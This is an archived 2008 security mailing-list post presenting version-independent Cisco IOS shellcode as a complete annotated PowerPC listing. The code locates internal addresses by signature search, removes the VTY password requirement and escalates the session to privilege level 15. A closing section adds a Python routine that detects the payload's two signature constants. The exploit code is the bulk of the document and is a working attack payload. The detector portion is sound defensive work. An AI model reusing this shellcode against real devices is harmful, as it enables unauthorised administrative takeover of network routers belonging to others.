Securityvulns, SECURITYVULNS:DOC:20388
Aug 21, 2008

Version-independent IOS shellcode

Hi,

One of the biggest problems with IOS exploitation is that on every
different version of IOS, the addresses required to execute useful
shellcode are different. Therefore, hard-coded addresses were inserted
into shellcode and this made exploits very version-dependent.

I have been working on a way around this and here is the first
iteration of just one of the solutions to the problem. It uses a
search routine to locate 4-byte signatures that occur near references
to the required addresses within the IOS image located in the "text"
memory region. The addresses are then recovered from memory and used
within the shellcode.

Cheers,

Andy

Version-independent IOS shellcode, Andy Davis 2008

No hard-coded IOS addresses required

The technique uses 4-byte signatures near references to the
required addresses within the IOS "text" memory region.
The addresses are then recovered from memory and used within the
shellcode.

This is beta 1 - this code can be highly optimised I'm sure,
for example, the search routine could be reused and the number
of registers cleared could be reduced - but it works :-)

As this is the first iteration of this shellcode, I'm not making any
claims as to exactly how portable it is - it has been tested on a
number of IOS images and therefore, the concept has been demonstrated.

Various simple techniques have been used to ensure that there are
no nulls in the shellcode

.equ sig_vty, 0x7F60B910 # signature for vty_info
.equ sig_kill, 0x639C8889 # signature for terminate()
.equ start, 0x80018001 # start of the search

3c 80 80 02 lis r4,-32766
38 84 80 01 addi r4,r4,-32767 # the start address for the search
3c a0 63 9d lis r5,25501
38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature
38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls (technique used throughout the shellcode)
38 e7 fe 70 addi r7,r7,-400
7c c4 38 6e l1: lwzux r6,r4,r7
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
40 82 ff f8 bne 18 <l1> # no, keep searching
7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill"
38 84 01 e8 addi r4,r4,488
38 84 fe 70 addi r4,r4,-400
7c c4 28 2e lwzx r6,r4,r5
38 a5 01 98 addi r5,r5,408
38 a5 fe 70 addi r5,r5,-400
7c c6 28 30 slw r6,r6,r5
7c c6 2c 30 srw r6,r6,r5
38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of terminate() from here
7c 84 32 14 add r4,r4,r6 # add offset to current address
7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10
7c e7 3a 78 xor r7,r7,r7
3c a0 7f 61 lis r5,32609
38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature
38 e7 01 94 addi r7,r7,404
38 e7 fe 70 addi r7,r7,-400
7c c4 38 6e l2: lwzux r6,r4,r7
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
40 82 ff f8 bne 64 <l2> # no, keep searching
38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty"
38 84 fe 70 addi r4,r4,-400
7c e7 3a 78 xor r7,r7,r7
7c a4 38 2e lwzx r5,r4,r7 # get two MSBs
38 a5 ff ff addi r5,r5,-1
7d 08 42 78 xor r8,r8,r8
39 08 01 a0 addi r8,r8,416
39 08 fe 70 addi r8,r8,-400
7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000)
38 84 01 94 addi r4,r4,404
38 84 fe 70 addi r4,r4,-400
7c c4 38 2e lwzx r6,r4,r7 # get two LSBs
7c c6 40 30 slw r6,r6,r8
7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY)
7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY)
38 a5 01 08 addi r5,r5,264 # move to the 66th element of the array (VTY 0 - see IOS "systat" command)
7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info
90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password
38 e7 ff ff addi r7,r7,-1
39 08 09 1a addi r8,r8,2330
90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15
7c e3 3b 78 mr r3,r7
7d 49 03 a6 mtctr r10
4e 80 04 20 bctr # terminate "this process"
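
For detection, the two search signatures are the fixed feature of this payload: each is built in a register by a `lis`/`addi` pair, so the constants can be recovered from captured bytes even though neither appears literally in them. The following Python is an added example, not part of the original post; it decodes such pairs at every byte offset of a buffer and flags those that rebuild `sig_kill` or `sig_vty`. The function names and the sample buffer are assumptions made for this example.

```python
import struct

# Signature constants taken from the .equ lines of the listing above.
KNOWN_SIGNATURES = {0x639C8889: "sig_kill", 0x7F60B910: "sig_vty"}

def _sext16(v):
    """Sign-extend a 16-bit immediate, as the PowerPC addi/addis forms do."""
    return v - 0x10000 if v & 0x8000 else v

def find_loaded_constants(buf):
    """Return (offset, register, constant) for every `lis rD,hi` followed
    directly by `addi rD,rD,lo` at any byte offset in buf (big-endian)."""
    hits = []
    for off in range(len(buf) - 7):
        w1, w2 = struct.unpack_from(">II", buf, off)
        # lis rD,hi is addis rD,0,hi: primary opcode 15 with rA == 0
        if w1 >> 26 != 15 or (w1 >> 16) & 0x1F != 0:
            continue
        rd = (w1 >> 21) & 0x1F
        # addi rD,rD,lo: primary opcode 14, same register as source and target
        if w2 >> 26 != 14 or (w2 >> 21) & 0x1F != rd or (w2 >> 16) & 0x1F != rd:
            continue
        const = ((_sext16(w1 & 0xFFFF) << 16) + _sext16(w2 & 0xFFFF)) & 0xFFFFFFFF
        hits.append((off, rd, const))
    return hits

def flag_signature_loads(buf):
    """Keep only the hits whose constant is one of the published signatures."""
    return [(off, KNOWN_SIGNATURES[c]) for off, _, c in find_loaded_constants(buf)
            if c in KNOWN_SIGNATURES]

# Constructed sample: 3 filler bytes, then instruction words copied from the
# listing above (search start, sig_kill load, sig_vty load).
SAMPLE = bytes.fromhex("414243"
                       "3c808002" "38848001"   # r4 = 0x80018001 (search start)
                       "3ca0639d" "38a58889"   # r5 = 0x639C8889 (sig_kill)
                       "3ca07f61" "38a5b910")  # r5 = 0x7F60B910 (sig_vty)

if __name__ == "__main__":
    for off, name in flag_signature_loads(SAMPLE):
        print(f"offset {off}: loads {name}")
```

A match only shows that a buffer builds one of these two constants with the `lis`/`addi` idiom used in the listing; a payload that uses different signatures or a different load sequence will not match.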